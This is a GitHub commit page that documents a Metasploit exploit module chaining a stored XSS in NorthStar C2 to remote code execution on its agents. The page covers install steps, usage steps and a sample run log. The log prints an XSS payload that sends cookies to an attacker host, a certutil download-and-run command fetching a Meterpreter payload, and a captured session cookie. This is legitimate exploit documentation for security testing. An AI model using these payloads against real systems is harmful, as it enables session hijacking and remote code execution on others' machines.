Skip to content

Commit

Permalink
northstar c2 exploit
Browse files Browse the repository at this point in the history
  • Loading branch information
@h00die
h00die committed Apr 17, 2024
1 parent c8d9702 commit 69949b2
Show file tree
Hide file tree
Showing 2 changed files with 393 additions and 0 deletions.
155 changes: 155 additions & 0 deletions documentation/modules/exploit/windows/http/northstar_c2_xss_to_agent_rce.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,155 @@
## Vulnerable Application

NorthStar C2, prior to commit `7674a44` on March 11 2024, contains a vulnerability where the logs page is
vulnerable to a stored xss.
An unauthenticated user can simulate an agent registration to cause the XSS and take over a users session.
With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts
(agents), and kill the original agent.

Successfully tested against NorthStar C2 commit `e7fdce148b6a81516e8aa5e5e037acd082611f73` running on
Ubuntu 22.04. The agent was running on Windows 10 19045.

![diagram](data:image/png;base64,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)

### Install NorthStar C2

Instructions for Ubuntu 22.04

```
sudo apt-get update
sudo apt-get install -y software-properties-common git wget mysql-server
sudo add-apt-repository ppa:ondrej/php
sudo apt-get update
sudo service mysql start
git clone https://github.com/EnginDemirbilek/NorthStarC2.git
cd NorthStarC2
git checkout e7fdce148b6a81516e8aa5e5e037acd082611f73
chmod +x install.sh
sudo ./install.sh # mysql answers: root:<empty>, make sure to give a website username/password
sudo apt-get purge -y php
sudo apt autoremove -y
sudo apt-get install -y php7.2 libapache2-mod-php7.2 php7.2-mysql
sudo a2dismod php*
sudo a2enmod php7.2
sudo service apache2 restart
```

### Agent Install

This should be done on a Windows computer:

On the c2 payload, you'll want to edit `Program.cs` on line 13 and edit `mainUri` to your northstar IP.
Now run the program, or compile and run it, and ensure the agent is active on the NorthStar C2 website.

## Verification Steps

1. Install the application, and connect an agent
1. Start msfconsole
1. Do: `use exploit/windows/http/northstar_c2_xss_to_agent_rce`
1. Do: `set rhosts [ip]`
1. Do: `set srvhost [srvhost]`
1. Do: `set fetch_srvport [fetch_srvport]`
1. Do: `set fetch_srvhost [fetch_srvhost]`
1. Do: `run`
1. Do: visit the NorthStarC2 site with a logged in user, and browse to the Server Logs page.
1. You should get a shell on each agent.

## Options

### KILL

If the NorthStarC2 agent should be explicitly killed on each compromised host. Defaults to `false`

## Scenarios

### NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 on Ubuntu 22.04 with an agent on Windows 10

```
resource (northstar.rq)> use exploit/windows/http/northstar_c2_xss_to_agent_rce
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
resource (northstar.rq)> set rhosts 4.4.4.4
rhosts => 4.4.4.4
resource (northstar.rq)> set srvhost 3.3.3.3
srvhost => 3.3.3.3
resource (northstar.rq)> set verbose true
verbose => true
resource (northstar.rq)> set FETCH_SRVPORT 9090
FETCH_SRVPORT => 9090
resource (northstar.rq)> set FETCH_srvhost 3.3.3.3
FETCH_srvhost => 3.3.3.3
msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) > exploit
[*] Command to run on remote host: certutil -urlcache -f http://3.3.3.3:9090/p3icRkNmQwbsIs7RYzV5sA %TEMP%\tKvCAnUBZgfn.exe & start /B %TEMP%\tKvCAnUBZgfn.exe
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/northstar_c2_xss_to_agent_rce) >
[*] Fetch handler listening on 3.3.3.3:9090
[*] HTTP server started
[*] Adding resource /p3icRkNmQwbsIs7RYzV5sA
[*] Started reverse TCP handler on 3.3.3.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. NorthStar Login page detected
[*] Sending XSS
[*] Sending: N*/</script><q
[*] Sending: N*/i.src=u/*q
[*] Sending: N*/new Image;/*q
[*] Sending: N*/var i=/*q
[*] Sending: N*/s+h+p+'/'+c;/*q
[*] Sending: N*/var u=/*q
[*] Sending: N*/'http://';/*q
[*] Sending: N*/var s=/*q
[*] Sending: N*/':8080';/*q
[*] Sending: N*/var p=/*q
[*] Sending: N*/a+b;/*q
[*] Sending: N*/var h=/*q
[*] Sending: N*/'.10.147';/*q
[*] Sending: N*/var b=/*q
[*] Sending: N*/'192.168';/*q
[*] Sending: N*/var a=/*q
[*] Sending: N*/d.cookie;/*q
[*] Sending: N*/var c=/*q
[*] Sending: N*/document;/*q
[*] Sending: N*/var d=/*q
[*] Sending: N</td><script>/*q
[*] Waiting on XSS execution
[*] Using URL: http://3.3.3.3:8080/
[*] Server started.
```

Now visit the site with a logged in user, and browse to the Server Logs page.

```
[*] 1.1.1.1 northstar_c2_xss_to_agent_rce - Received GET request.
[+] 1.1.1.1 northstar_c2_xss_to_agent_rce - Received cookie: st0sfhqto9mqtpd81rlg6hq5g5
[+] 1.1.1.1 northstar_c2_xss_to_agent_rce - Live Agents
===========
ID IP OS Username Hostname Status
-- -- -- -------- -------- ------
NC1S7X834eJVcJtynrq 222.222.22.222 Windows 10 Enterprise DESKTOP-Q0HUOEI\h00die DESKTOP-Q0HUOEI Online
